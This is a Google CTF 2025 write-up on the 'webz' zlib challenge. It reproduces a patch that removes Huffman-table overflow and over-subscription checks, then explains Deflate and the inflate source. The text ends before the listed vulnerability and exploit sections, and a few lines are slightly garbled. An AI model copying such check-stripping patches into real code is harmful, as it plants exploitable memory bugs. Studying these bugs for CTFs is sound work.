[CTF] Google CTF 2025 - webz : Exploiting zlib's Huffman Code Table [English]

The Amazing Digital Orange·2025년 8월 26일

목록 보기

10/11

한국어: https://velog.io/@0range1337/CTF-Google-CTF-2025-webz-Exploiting-zlibs-Huffman-Code-Table

1. Overview
2. Background
	2-1. google-zlib-Increase-Huffman-Table-Size.patch
	2-2. Deflate Algorithm
		2-2-1. LZ77
		2-2-2. Huffman Coding
3. Code Analysis
	3-1. Inflate
	3-2. Huffman Table
	3-3. Decode
4. Vulnerability
	4-1. Unintialized Huffman Code Table
	4-2. Exploiting inflate_fast
    	4-2-1. Integer Overflow (Unexploitable)
    	4-2-2. PoC
        4-2-3. Stream Overflow (Exploitable)
    	4-2-4. PoC
5. Exploit

1. Overview

webz is a zlib exploitation challenge from Google CTF 2025. The Google-zlib implementation provided in the challenge is not upstream; it’s a version with an arbitrary patch applied. Whereas typical open‑source exploit challenges ship a patch that clearly introduces a vulnerability, webz’s Google-zlib patch appears—at first glance—to be a normal optimization.

In practice, the vulnerability in this Google-zlib can be found quickly via fuzzing. However, in this write‑up we’ll derive the precise root cause through source analysis.

2. Background

The Google-zlib codebase isn’t large, but it is quite tricky. Because it implements compression algorithms, manipulates data at the bit level, and contains optimizations that sacrifice readability, analysis can be difficult.

// webz.c:L114
    int ret = inflateInit2(&webz_state.infstream, -15);
    webz_state.infstream.msg = webz_state.ok_status;

    if (ret != Z_OK) {
        printf("Error: inflateInit failed: %d\n", ret);
        return;
    }

    ret = inflate(&webz_state.infstream, Z_NO_FLUSH);

    if (ret != Z_STREAM_END) {
        printf("Error: inflate failed: %d\n", ret);
        inflateEnd(&webz_state.infstream);
        return;
    }

    inflateEnd(&webz_state.infstream);

// zlib.h\:L570
/\*
windowBits can also be -8..-15 for raw deflate.  In this case, -windowBits
determines the window size.  deflate() will then generate raw deflate data
with no zlib header or trailer, and will not compute a check value.
\*/

First, let’s look at the provided webz.c. It’s simply a wrapper around Google-zlib. It receives raw Deflate-compressed data from the user and decompresses it using Google-zlib’s inflate. Therefore, we must identify vulnerabilities in the code that implements inflate: inflate.c, inftrees.c, and inffast.c.

inflate.c
The core of the inflate implementation. The inflate function is a virtual finite-state machine, treating the given compressed data like opcodes for a virtual machine. As we’ll examine later, it processes compressed data in blocks.

inftrees.c
One of the compression techniques used in Deflate is Huffman coding. To decode Huffman-coded data in the inflate implementation, a Huffman table must be constructed; inftrees.c contains that Huffman table construction code.

inffast.c
inffast.c contains inflate_fast, a high-speed implementation of inflate decoding. Under certain conditions, inflate calls inflate_fast to decode data.

2-1. google-zlib-Increase-Huffman-Table-Size.patch

From 2c282408771115b3cf80eeb9572927b796ddea79 Mon Sep 17 00:00:00 2001
From: Brendon Tiszka <tiszka@google.com>
Date: Wed, 21 May 2025 15:11:52 +0000
Subject: [PATCH] [google-zlib] Increase Huffman Table Size

The basic idea is to use a bigger root & secondary table for both
dists and lens, allowing us to avoid oversubscription chekcs.
---
 inftrees.c | 18 ------------------
 inftrees.h | 18 +++++-------------
 2 files changed, 5 insertions(+), 31 deletions(-)

diff --git a/inftrees.c b/inftrees.c
index a127e6b..7a8dd2e 100644
--- a/inftrees.c
+++ b/inftrees.c
@@ -122,16 +122,6 @@ int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens,
         if (count[min] != 0) break;
     if (root < min) root = min;
 
-    /* check for an over-subscribed or incomplete set of lengths */
-    left = 1;
-    for (len = 1; len <= MAXBITS; len++) {
-        left <<= 1;
-        left -= count[len];
-        if (left < 0) return -1;        /* over-subscribed */
-    }
-    if (left > 0 && (type == CODES || max != 1))
-        return -1;                      /* incomplete set */
-
     /* generate offsets into symbol table for each length for sorting */
     offs[1] = 0;
     for (len = 1; len < MAXBITS; len++)
@@ -200,11 +190,6 @@ int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens,
     used = 1U << root;          /* use root table entries */
     mask = used - 1;            /* mask for comparing low */
 
-    /* check available table space */
-    if ((type == LENS && used > ENOUGH_LENS) ||
-        (type == DISTS && used > ENOUGH_DISTS))
-        return 1;
-
     /* process all codes and make table entries */
     for (;;) {
         /* create table entry */
@@ -270,9 +255,6 @@ int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens,
 
             /* check for enough space */
             used += 1U << curr;
-            if ((type == LENS && used > ENOUGH_LENS) ||
-                (type == DISTS && used > ENOUGH_DISTS))
-                return 1;
 
             /* point entry in root table to sub-table */
             low = huff & mask;
diff --git a/inftrees.h b/inftrees.h
index 396f74b..42c2c44 100644
--- a/inftrees.h
+++ b/inftrees.h
@@ -35,19 +35,11 @@ typedef struct {
     01000000 - invalid code
  */
 
-/* Maximum size of the dynamic table.  The maximum number of code structures is
-   1444, which is the sum of 852 for literal/length codes and 592 for distance
-   codes.  These values were found by exhaustive searches using the program
-   examples/enough.c found in the zlib distribution.  The arguments to that
-   program are the number of symbols, the initial root table size, and the
-   maximum bit length of a code.  "enough 286 9 15" for literal/length codes
-   returns 852, and "enough 30 6 15" for distance codes returns 592. The
-   initial root table size (9 or 6) is found in the fifth argument of the
-   inflate_table() calls in inflate.c and infback.c.  If the root table size is
-   changed, then these maximum sizes would be need to be recalculated and
-   updated. */
-#define ENOUGH_LENS 852
-#define ENOUGH_DISTS 592
+/* Memory/speed tradeoff. Alocate more-than-ENOUGH space for LENS and
+   DISTS so we can remove overflow checks from `inflate`.
+*/
+#define ENOUGH_LENS (1 << 15)
+#define ENOUGH_DISTS (1 << 15)
 #define ENOUGH (ENOUGH_LENS+ENOUGH_DISTS)
 
 /* Type of code to build for inflate_table() */
-- 
2.50.0.rc0.642.g800a2b2222-goog

The Google-zlib source shipped with the challenge contains a 0001-google-zlib-Increase-Huffman-Table-Size.patch. From that patch we can see the code has been modified as above.

The patch removes some checks in inftrees.c and greatly increases the values of ENOUGH_LENS and ENOUGH_DISTS. From the comments, the patch increases the sizes of Huffman tables and removes related checks to achieve a memory/speed tradeoff optimization. At this point we don’t yet know exactly what issues this introduces, but it’s clear the vulnerability will be related to Huffman tables and Huffman coding.

2-2. Deflate Algorithm

Before analyzing the code, let’s review the Deflate compression algorithm. Deflate uses Huffman coding and the LZ77 algorithm to compress data.

2-2-1. LZ77

The principle of the LZ77 algorithm is very simple: repeated data is replaced by (length, distance) pairs.

ABCDEEABCDFF -> ABCDEE(4,6)FF

The length is how many bytes to copy, and the distance is how far back from the current position the source data lies.

2-2-1. Huffman Coding

Huffman coding is a bit more involved. The basic idea is to replace original data with compressed bit sequences. While the minimum unit of data is typically a byte (8 bits), replacing values with shorter bit sequences reduces size.

ABABAAAABBBB (12 Byte, 96bit) -> 010100001111 ( 1.5 Byte, 12bit)

In this example there are only two symbols, A and B, which can be encoded with 1-bit Huffman codes (0 and 1). If there are more than two symbols, you obviously cannot compress them all with 1-bit codes.

A -> 00
B -> 01
C -> 10
D -> 110
E -> 111

ABCDABCEABC -> 000110110000110111

As shown, Huffman codes depend on the data being compressed, so to decode the compressed data, you need a table mapping {Huffman code : actual value}.

A Huffman code cannot be the prefix of another Huffman code. For example, if 111 is a code, then 11 cannot be a code; since codes have variable length, a prefix collision like 1110 would be ambiguous—unclear whether it’s 111 + 0 or 11 + 10.

Also, the minimum and maximum code lengths vary depending on the number of distinct data values. Huffman coding assigns shorter codes (e.g., 2 bits) to high-frequency values (A, B, C) and longer codes (e.g., 3 bits) to low-frequency values (D, E) to compress effectively.

Additionally, consider this: if Deflate generates efficient Huffman codes tailored to the input, then the decoder needs the corresponding Huffman table to decode. Therefore, Deflate uses either fixed Huffman tables or dynamic Huffman tables depending on the situation.

Fixed Huffman table
Predefined in Deflate/Inflate. It doesn’t always give the most efficient compression for the data, but you don’t need to include a Huffman table in the final compressed stream.

Dynamic Huffman table
Performs optimal Huffman coding for the given data, and includes in the final compressed data the Huffman table necessary to decode it.

Let’s elaborate on “including the Huffman table in the final compressed data.” In the standard implementation, the Huffman table can be represented using only code lengths.

A -> 00
B -> 01
C -> 10
D -> 110
E -> 111

Rather than storing the entire codes as above, you can store just the code lengths:

A -> 2
B -> 2
C -> 2
D -> 3
E -> 3

Since actual Huffman codes have lengths in the range 3–15 bits, storing only lengths reduces the size of the embedded Huffman tables.

Separately from using code lengths to compress the Huffman table, Google‑zlib compresses the lengths themselves again using Huffman coding. We’ll discuss this in more detail during the source analysis below.

huffman_table['A'] = 2
huffman_table['B'] = 2
huffman_table['C'] = 2
huffman_table['D'] = 3
huffman_table['E'] = 3

This works for a simple reason. A Huffman table is an array indexed by the original symbol. Assign the first 2-bit code 00 to A; then B gets 01, C gets 10, and so on. Using only lengths and order, all codes are recoverable. In other words, if Deflate assigns codes in order, Inflate can reconstruct them from just the lengths.

Deflate uses Huffman coding not only for literal values (0–255), but also for the LZ77 (length, distance) pairs.

3. Code Analysis

3-1. Inflate

int ZEXPORT inflate(z_streamp strm, int flush) {
    struct inflate_state FAR *state;
    z_const unsigned char FAR *next;    /* next input */
    unsigned char FAR *put;     /* next output */
    unsigned have, left;        /* available input and output */
    unsigned long hold;         /* bit buffer */
    unsigned bits;              /* bits in bit buffer */
    unsigned in, out;           /* save starting available input and output */
    unsigned copy;              /* number of stored or match bytes to copy */
    unsigned char FAR *from;    /* where to copy match bytes from */
    code here;                  /* current decoding table entry */
    code last;                  /* parent table entry */
    unsigned len;               /* length to copy for repeats, bits to drop */
    int ret;                    /* return code */
#ifdef GUNZIP
    unsigned char hbuf[4];      /* buffer for gzip header crc calculation */
#endif
    static const unsigned short order[19] = /* permutation of code lengths */
        {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15};

    if (inflateStateCheck(strm) || strm->next_out == Z_NULL ||
        (strm->next_in == Z_NULL && strm->avail_in != 0))
        return Z_STREAM_ERROR;

    state = (struct inflate_state FAR *)strm->state;
    if (state->mode == TYPE) state->mode = TYPEDO;      /* skip check */
    LOAD();
    in = have;
    out = left;
    ret = Z_OK;
    for (;;)
        switch (state->mode) {
        case HEAD:
            if (state->wrap == 0) {
                state->mode = TYPEDO;
                break;
            }
            ...

inflate is a virtual finite-state machine. It treats the compressed data stream (strm) as opcodes and executes like a VM. Since inflateInit2_ sets state->mode = HEAD, it transitions to state->mode = TYPEDO, and then hits the case TYPEDO.

/* Load registers with state in inflate() for speed */
#define LOAD() \
    do { \
        put = strm->next_out; \
        left = strm->avail_out; \
        next = strm->next_in; \
        have = strm->avail_in; \
        hold = state->hold; \
        bits = state->bits; \
    } while (0)

/* Restore state from registers in inflate() */
#define RESTORE() \
    do { \
        strm->next_out = put; \
        strm->avail_out = left; \
        strm->next_in = next; \
        strm->avail_in = have; \
        state->hold = hold; \
        state->bits = bits; \
    } while (0)

strm->next_out: end pointer of the decompressed output buffer that’s been filled so far

strm->avail_out: remaining size of the decompression buffer

strm->next_in: end pointer of the processed input data

strm->avail_in: remaining number of input bytes to process

state->hold: buffer used for bit operations

state->bits: current bit length stored in state->hold

Before the main loop, let’s note some macros and variables used by Inflate. Members of the strm structure don’t benefit from register optimization, so these macros copy them into locals for faster operations.

/* Get a byte of input into the bit accumulator, or return from inflate()
   if there is no input available. */
#define PULLBYTE() \
    do { \
        if (have == 0) goto inf_leave; \
        have--; \
        hold += (unsigned long)(*next++) << bits; \
        bits += 8; \
    } while (0)

/* Assure that there are at least n bits in the bit accumulator.  If there is
   not enough available input to do that, then return from inflate(). */
#define NEEDBITS(n) \
    do { \
        while (bits < (unsigned)(n)) \
            PULLBYTE(); \
    } while (0)

/* Return the low n bits of the bit accumulator (n < 16) */
#define BITS(n) \
    ((unsigned)hold & ((1U << (n)) - 1))

/* Remove n bits from the bit accumulator */
#define DROPBITS(n) \
    do { \
        hold >>= (n); \
        bits -= (unsigned)(n); \
    } while (0)

Unlike byte-oriented data, compressed data is processed at bit granularity because of packing and Huffman coding. The Inflate implementation uses macros like these to fill a bit buffer (hold) and manipulate it bitwise.

The basic logic is: use NEEDBITS to pull bits from strm->next_in (next) into state->hold (hold), decreasing strm->avail_in (have) accordingly. Then extract as many bits as needed with BITS, and drop consumed bits with DROPBITS.

Using this bit-level handling, the code decodes the compressed data and appends the decoded bytes to strm->next_out (put), decreasing strm->avail_out (left) by the number of bytes written.

        case TYPEDO:
            if (state->last) {
                BYTEBITS();
                state->mode = CHECK;
                break;
            }
            NEEDBITS(3);
            state->last = BITS(1);
            DROPBITS(1);
            switch (BITS(2)) {
            case 0:                             /* stored block */
                Tracev((stderr, "inflate:     stored block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = STORED;
                break;
            case 1:                             /* fixed block */
                fixedtables(state);
                Tracev((stderr, "inflate:     fixed codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = LEN_;             /* decode codes */
                if (flush == Z_TREES) {
                    DROPBITS(2);
                    goto inf_leave;
                }
                break;
            case 2:                             /* dynamic block */
                Tracev((stderr, "inflate:     dynamic codes block%s\n",
                        state->last ? " (last)" : ""));
                state->mode = TABLE;
                break;
            case 3:
                strm->msg = (z_const char *)"invalid block type";
                state->mode = BAD;
            }
            DROPBITS(2);
            break;

Back in inflate, compressed data is processed in blocks, starting at case TYPEDO. After ensuring at least 3 bits in the buffer (NEEDBITS(3)), it reads 1 bit with BITS(1) to set state->last, which indicates whether this block is the last one. It then drops that bit and uses the next two bits to select the block type.

stored block (0): a block of uncompressed data. When state->mode = STORED, it will directly copy from strm->next_in to strm->next_out.

fixed codes block (1): data compressed with the fixed Huffman table. fixedtables(state) builds the fixed table, then state->mode = LEN_ moves to the Huffman decoding path.

dynamic codes block (2): data compressed with a dynamic Huffman table. state->mode = TABLE reads dynamic table info from the compressed stream, constructs the dynamic Huffman table, then proceeds to decode.

Blocks have the following forms:

[0(stored_bock) + state->last + length to copy + uncompressed bytes to copy]
[1(fixed codes block) + state->last + compressed data (Huffman codes) + Huffman code for End of Block]
[2(Dynamic codes block) + state->last + dynamic table info (Code Huffman table + compressed Literal/Length and Distance Huffman tables) + compressed data (Huffman codes) + Huffman code for End of Block ]

The compressed stream consists of one or more blocks, and inflate decodes each according to the code above.

        case TABLE:
            NEEDBITS(14);
            state->nlen = BITS(5) + 257;
            DROPBITS(5);
            state->ndist = BITS(5) + 1;
            DROPBITS(5);
            state->ncode = BITS(4) + 4;
            DROPBITS(4);
#ifndef PKZIP_BUG_WORKAROUND
            if (state->nlen > 286 || state->ndist > 30) {
                strm->msg = (z_const char *)"too many length or distance symbols";
                state->mode = BAD;
                break;
            }
#endif
            Tracev((stderr, "inflate:       table sizes ok\n"));
            state->have = 0;
            state->mode = LENLENS;
                /* fallthrough */

Let’s look at how a dynamic Huffman table is built. As noted earlier, a dynamic codes block includes a Code Huffman table, and compressed Literal/Length and Distance tables. The code above reads the lengths for those three tables.

The Literal/Length table contains codes for literal bytes (A, B, …) and for LZ77 lengths; the Distance table holds codes for LZ77 distances. Using these two tables, the decoder performs Huffman and LZ77 decoding. So what is the Code Huffman table? The Literal/Length and Distance tables are stored compressed in the stream—again via Huffman coding. The Code Huffman table is the dynamic Huffman table used to decode the Huffman tables (lengths) themselves.

        case LENLENS:
            while (state->have < state->ncode) {
                NEEDBITS(3);
                state->lens[order[state->have++]] = (unsigned short)BITS(3);
                DROPBITS(3);
            }
            while (state->have < 19)
                state->lens[order[state->have++]] = 0;
            state->next = state->codes;
            state->lencode = state->distcode = (const code FAR *)(state->next);
            state->lenbits = 7;
            ret = inflate_table(CODES, state->lens, 19, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (z_const char *)"invalid code lengths set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate:       code lengths ok\n"));
            state->have = 0;
            state->mode = CODELENS;
                /* fallthrough */

First, we read the Code Huffman table lengths. We loop state->ncode times and read 3 bits each time into state->lens. These 3-bit values are code lengths—the Huffman table is represented by lengths, not the full bit patterns, as discussed earlier. Thus, state->lens records the Code Huffman table’s code lengths in the order permutation.

static const unsigned short order[19] = /* permutation of code lengths */
        {16, 17, 18, 0, 8, 7, 9, 6, 10, 5, 11, 4, 12, 3, 13, 2, 14, 1, 15};

Here, order reduces the size of the encoded Code Huffman table. The Code table decodes original values 0–18. Storing lengths for all 19 values would be inefficient.

Typically, codes are used more frequently in the same order as order. If we stored lengths in plain 0–18 order, we’d need to write zeros for many unused values (e.g., 0–15) before the frequently used 16, 17, 18. By ordering them as above, we can store just the lengths for the frequently used codes and leave the rest implicit. The code reflects this: it reads state->ncode lengths, and sets the remaining entries to zero.

We then set state->next to point into state->codes, and call inflate_table to build the Huffman table. The resulting table is written at state->next (state->lencode). We’ll cover inflate_table shortly. For now, note the parameters: CODES (build the Code table), state->lens (length array), 19 (number of symbols, 0–18), &(state->next) (output pointer for the constructed table), &(state->lenbits) (table index bit width—initially 7, but may be adjusted by inflate_table), and state->work (a temporary array for sorting).

        case CODELENS:
            while (state->have < state->nlen + state->ndist) {
                for (;;) {
                    here = state->lencode[BITS(state->lenbits)];
                    if ((unsigned)(here.bits) <= bits) break;
                    PULLBYTE();
                }
                if (here.val < 16) {
                    DROPBITS(here.bits);
                    state->lens[state->have++] = here.val;
                }
                else {
                    if (here.val == 16) {
                        NEEDBITS(here.bits + 2);
                        DROPBITS(here.bits);
                        if (state->have == 0) {
                            strm->msg = (z_const char *)"invalid bit length repeat";
                            state->mode = BAD;
                            break;
                        }
                        len = state->lens[state->have - 1];
                        copy = 3 + BITS(2);
                        DROPBITS(2);
                    }
                    else if (here.val == 17) {
                        NEEDBITS(here.bits + 3);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 3 + BITS(3);
                        DROPBITS(3);
                    }
                    else {
                        NEEDBITS(here.bits + 7);
                        DROPBITS(here.bits);
                        len = 0;
                        copy = 11 + BITS(7);
                        DROPBITS(7);
                    }
                    if (state->have + copy > state->nlen + state->ndist) {
                        strm->msg = (z_const char *)"invalid bit length repeat";
                        state->mode = BAD;
                        break;
                    }
                    while (copy--)
                        state->lens[state->have++] = (unsigned short)len;
                }
            }

            /* handle error breaks in while */
            if (state->mode == BAD) break;

            /* check for end-of-block code (better have one) */
            if (state->lens[256] == 0) {
                strm->msg = (z_const char *)"invalid code -- missing end-of-block";
                state->mode = BAD;
                break;
            }

            /* build code tables -- note: do not change the lenbits or distbits
               values here (9 and 6) without reading the comments in inftrees.h
               concerning the ENOUGH constants, which depend on those values */
            state->next = state->codes;
            state->lencode = (const code FAR *)(state->next);
            state->lenbits = 9;
            ret = inflate_table(LENS, state->lens, state->nlen, &(state->next),
                                &(state->lenbits), state->work);
            if (ret) {
                strm->msg = (z_const char *)"invalid literal/lengths set";
                state->mode = BAD;
                break;
            }
            state->distcode = (const code FAR *)(state->next);
            state->distbits = 6;
            ret = inflate_table(DISTS, state->lens + state->nlen, state->ndist,
                            &(state->next), &(state->distbits), state->work);
            if (ret) {
                strm->msg = (z_const char *)"invalid distances set";
                state->mode = BAD;
                break;
            }
            Tracev((stderr, "inflate:       codes ok\n"));
            state->mode = LEN_;
            if (flush == Z_TREES) goto inf_leave;
                /* fallthrough */

Once the Code table is built, we decode the compressed lengths of the Literal/Length and Distance tables. We read state->lenbits bits and use the Code table state->lencode to decode entries, retrieving a code struct from the table.

Values 0–18 decoded via the Code table are not literal decoded bytes. Based on the code, they behave as follows:

0–15: literal code lengths 0–15 directly

16: repeat previous length 3–6 times

17: repeat length 0, 3–10 times

18: repeat length 0, 11–138 times

Here “original value” refers to the value decoded by Huffman coding, not necessarily the final decompressed byte. Some values (0–15) correspond to actual lengths, others (16–18) are special symbols.

code here;

We’ll explain this struct in the Huffman table construction section. Depending on its members, various actions occur to ultimately decode each value.

As before, we call inflate_table to build the final state->lencode and state->distcode tables for Literal/Length and Distance respectively.

The Code table is no longer needed, so overwriting state->lencode is fine.

        case LEN:
            if (have >= 6 && left >= 258) {
                RESTORE();
                inflate_fast(strm, out);
                LOAD();
                if (state->mode == TYPE)
                    state->back = -1;
                break;
            }
            state->back = 0;
            for (;;) {
                here = state->lencode[BITS(state->lenbits)];
                if ((unsigned)(here.bits) <= bits) break;
                PULLBYTE();
            }
            if (here.op && (here.op & 0xf0) == 0) {
                last = here;
                for (;;) {
                    here = state->lencode[last.val +
                            (BITS(last.bits + last.op) >> last.bits)];
                    if ((unsigned)(last.bits + here.bits) <= bits) break;
                    PULLBYTE();
                }
                DROPBITS(last.bits);
                state->back += last.bits;
            }
            DROPBITS(here.bits);
            state->back += here.bits;
            state->length = (unsigned)here.val;
            if ((int)(here.op) == 0) {
                Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ?
                        "inflate:         literal '%c'\n" :
                        "inflate:         literal 0x%02x\n", here.val));
                state->mode = LIT;
                break;
            }
            if (here.op & 32) {
                Tracevv((stderr, "inflate:         end of block\n"));
                state->back = -1;
                state->mode = TYPE;
                break;
            }
            if (here.op & 64) {
                strm->msg = (z_const char *)"invalid literal/length code";
                state->mode = BAD;
                break;
            }
            state->extra = (unsigned)(here.op) & 15;
            state->mode = LENEXT;
                /* fallthrough */

We now enter the decoding process. Again, we fetch a code from the table and take actions based on its fields to decode the original value.

        case LIT:
            if (left == 0) goto inf_leave;
            *put++ = (unsigned char)(state->length);
            left--;
            state->mode = LEN;
            break;

A quick check shows that when here.op == 0, we switch to state->mode = LIT and append here.val (the literal byte) to strm->next_out (put). Also, here.bits is the number of bits consumed to decode that symbol; i.e., it’s the code length, and the decoder uses DROPBITS(here.bits) to consume bits. This is standard Huffman decoding. But there are other decoding forms depending on here.op—we’ll explain this in the table construction section.

        case LEN:
            if (have >= 6 && left >= 258) {
                RESTORE();
                inflate_fast(strm, out);
                LOAD();
                if (state->mode == TYPE)
                    state->back = -1;
                break;
            }

Back to the code snippet above. If have and left are large enough, inflate calls inflate_fast for high-speed decoding. The in-function Huffman decoding is slower because it transitions through VM-like states; inflate_fast operates with full buffers and fewer checks. Therefore, inflate_fast requires sufficiently large input/output buffers to be safe.

3-2. Huffman Table

int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens,
                                unsigned codes, code FAR * FAR *table,
                                unsigned FAR *bits, unsigned short FAR *work) {

Let’s revisit inflate_table’s parameters:

codetype type: table type (Code, Literal/Length, Distance)

unsigned short FAR *lens: array of code lengths
unsigned codes: number of symbols (table entries)
code FAR * FAR *table: output pointer to the constructed table
unsigned FAR *bits: pointer to the number of index bits for the table (may be adjusted)
unsigned short FAR *work: scratch array for sorting, etc.

typedef struct {
    unsigned char op;           /* operation, extra bits, table bits */
    unsigned char bits;         /* bits in this part of the code */
    unsigned short val;         /* offset in table or code value */
} code;

/* op values as set by inflate_table():
    00000000 - literal
    0000tttt - table link, tttt != 0 is the number of table index bits
    0001eeee - length or distance, eeee is the number of extra bits
    01100000 - end of block
    01000000 - invalid code
 */

Now, the code struct. The Huffman table is an array of code structs; op determines how to decode, bits is the code length, and val holds the value. As the comment indicates, these fields can play different roles depending on op.


    /* accumulate lengths for codes (assumes lens[] all in 0..MAXBITS) */
    for (len = 0; len <= MAXBITS; len++)
        count[len] = 0;
    for (sym = 0; sym < codes; sym++)
        count[lens[sym]]++;

    /* bound code lengths, force root to be within code lengths */
    root = *bits;
    for (max = MAXBITS; max >= 1; max--)
        if (count[max] != 0) break;
    if (root > max) root = max;
    if (max == 0) {                     /* no symbols to code at all */
        here.op = (unsigned char)64;    /* invalid code marker */
        here.bits = (unsigned char)1;
        here.val = (unsigned short)0;
        *(*table)++ = here;             /* make a table to force an error */
        *(*table)++ = here;
        *bits = 1;
        return 0;     /* no symbols, but wait for decoding to report error */
    }
    for (min = 1; min < max; min++)
        if (count[min] != 0) break;
    if (root < min) root = min;

    /* generate offsets into symbol table for each length for sorting */
    offs[1] = 0;
    for (len = 1; len < MAXBITS; len++)
        offs[len + 1] = offs[len] + count[len];

    /* sort symbols by length, by symbol order within each length */
    for (sym = 0; sym < codes; sym++)
        if (lens[sym] != 0) work[offs[lens[sym]]++] = (unsigned short)sym;

Let’s step through table construction. First we count, for each code length, how many symbols use that length.

We then determine the minimum and maximum code lengths from count and set root, the table’s index bit width. root initially comes from the bits argument but may be adjusted based on min/max. That’s why bits is a pointer: any adjustments made in inflate_table must also be visible to the caller.

The Huffman table is a simple 1D array, indexed by bits: table[huffman_code] = decoded_value (actually a code struct to decode it). Thus, root is really the number of index bits—i.e., the size of the primary table. If root=7, the table has entries up to table[127(0b1111111)].

If root > max, set root = max to avoid wasting space. If root < min, set root = min; otherwise you couldn’t store any codes at all.

But if root = min, how do we store codes longer than root? Using multi-level tables. As we’ve seen, the op field can indicate a second-level lookup. For example, suppose there are ten 8‑bit codes and one 9‑bit code. You don’t want to double the table size (from 256 to 512 entries) just for one symbol. So the primary table has 256 entries; all 8‑bit codes and the prefixes of any longer codes are stored there. For longer codes, entries in the primary table point to sub-tables that hold the remaining bits.

We’ll see the exact mechanics below.

Once root is decided, we build the offs array to sort symbols by code length and symbol order into work. The work array is needed to reconstruct the full Huffman codes from the lengths.

A -> 2 (00)
B -> 3 (110)
C -> 2 (01)
D -> 2 (10)
E -> 3 (111)

To reconstruct codes from lengths, group symbols with the same length and assign codes in order:

A -> 2 (00)
C -> 2 (01)
D -> 2 (10)
B -> 3 (110)
E -> 3 (111)

work is the array that encodes this ordering; the build loop will walk work to assign codes.

    /* set up for code type */
    switch (type) {
    case CODES:
        base = extra = work;    /* dummy value--not used */
        match = 20;
        break;
    case LENS:
        base = lbase;
        extra = lext;
        match = 257;
        break;
    default:    /* DISTS */
        base = dbase;
        extra = dext;
        match = 0;
    }

Depending on type, we set match, base, and extra. These support the Base/Extra decoding mode described below.

Dynamic Huffman table lengths in the stream are usually stored by position (index), since that index is the original value—e.g., index 65 corresponds to ‘A’. This is efficient for literals (0–255). But what about LZ77 length/distance values? Deflate specifies length range 3–258 and distance range 1–32,768, making a direct per‑value table impractical. So lengths and distances use Base/Extra coding.

match indicates where Base/Extra decoding begins. For Literal/Length, 0–255 are literals and 256 is End of Block; from 257 upward (LZ77 lengths), Base/Extra applies—so match=257. The Code table doesn’t use Base/Extra at all, so match=20 (greater than the largest code index). Distance uses Base/Extra for all symbols, so match=0.

base and extra select the arrays used for Base/Extra depending on whether we’re building the length or distance table.

    /* initialize state for loop */
    huff = 0;                   /* starting code */
    sym = 0;                    /* starting code symbol */
    len = min;                  /* starting code length */
    next = *table;              /* current table to fill in */
    curr = root;                /* current table index bits */
    drop = 0;                   /* current bits to drop from code for index */
    low = (unsigned)(-1);       /* trigger new sub-table when len > root */
    used = 1U << root;          /* use root table entries */
    mask = used - 1;            /* mask for comparing low */

    /* process all codes and make table entries */
    for (;;) {
        /* create table entry */
        here.bits = (unsigned char)(len - drop);
        if (work[sym] + 1U < match) {
            here.op = (unsigned char)0;
            here.val = work[sym];
        }
        else if (work[sym] >= match) {
            here.op = (unsigned char)(extra[work[sym] - match]);
            here.val = base[work[sym] - match];
        }
        else {
            here.op = (unsigned char)(32 + 64);         /* end of block */
            here.val = 0;
        }

This is the main construction loop. We iterate through work, creating a code entry for each symbol. If symbol+1 < match, it’s a normal entry: op=0, val=symbol. As we saw in case LIT:, decoding such an entry emits val.

Recall: “original value” here means the Huffman-decoded value. In the simple case above, it’s the final literal; with Base/Extra, it’s a special symbol that needs further interpretation.

If symbol >= match, we create an entry using the Base/Extra scheme: op holds the number of extra bits, val holds the base.

            state->length = (unsigned)here.val;
            if ((int)(here.op) == 0) {
                Tracevv((stderr, here.val >= 0x20 && here.val < 0x7f ?
                        "inflate:         literal '%c'\n" :
                        "inflate:         literal 0x%02x\n", here.val));
                state->mode = LIT;
                break;
            }
            if (here.op & 32) {
                Tracevv((stderr, "inflate:         end of block\n"));
                state->back = -1;
                state->mode = TYPE;
                break;
            }
            if (here.op & 64) {
                strm->msg = (z_const char *)"invalid literal/length code";
                state->mode = BAD;
                break;
            }
            state->extra = (unsigned)(here.op) & 15;
            state->mode = LENEXT;
                /* fallthrough */
        case LENEXT:
            if (state->extra) {
                NEEDBITS(state->extra);
                state->length += BITS(state->extra);
                DROPBITS(state->extra);
                state->back += state->extra;
            }
            Tracevv((stderr, "inflate:         length %u\n", state->length));
            state->was = state->length;
            state->mode = DIST;
                /* fallthrough */

To understand Base/Extra, look at the length-decoding routine in inflate. First, state->length = here.val (the base). Then, based on op, if it’s not a literal/end/invalid, we go to length decoding.

op & 15 extracts the number of extra bits. We then read that many bits and add them to the base to get the final length.

The op & 15 is necessary because the lext/dext arrays encode flags along with the count of extra bits.

    static const unsigned short lbase[31] = { /* Length codes 257..285 base */
        3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31,
        35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258, 0, 0};
    static const unsigned short lext[31] = { /* Length codes 257..285 extra */
        16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 18, 18, 18, 18,
        19, 19, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 16, 73, 200};
    static const unsigned short dbase[32] = { /* Distance codes 0..29 base */
        1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193,
        257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145,
        8193, 12289, 16385, 24577, 0, 0};
    static const unsigned short dext[32] = { /* Distance codes 0..29 extra */
        16, 16, 16, 16, 17, 17, 18, 18, 19, 19, 20, 20, 21, 21, 22, 22,
        23, 23, 24, 24, 25, 25, 26, 26, 27, 27,
        28, 28, 29, 29, 64, 64};

For example, suppose we want to decode length 20. Its code length entry would be at huffman_table[269].

here.op = extra - match](257) = extra[12] = lext[12] = 18
here.val = base - match(257)] = base[12] = lbase[12] = 19

The length routine then computes state->length = 19 + BITS(18 & 15 (2)). If the stream provides 01 as the extra bits, we decode 19 + 1 = 20.
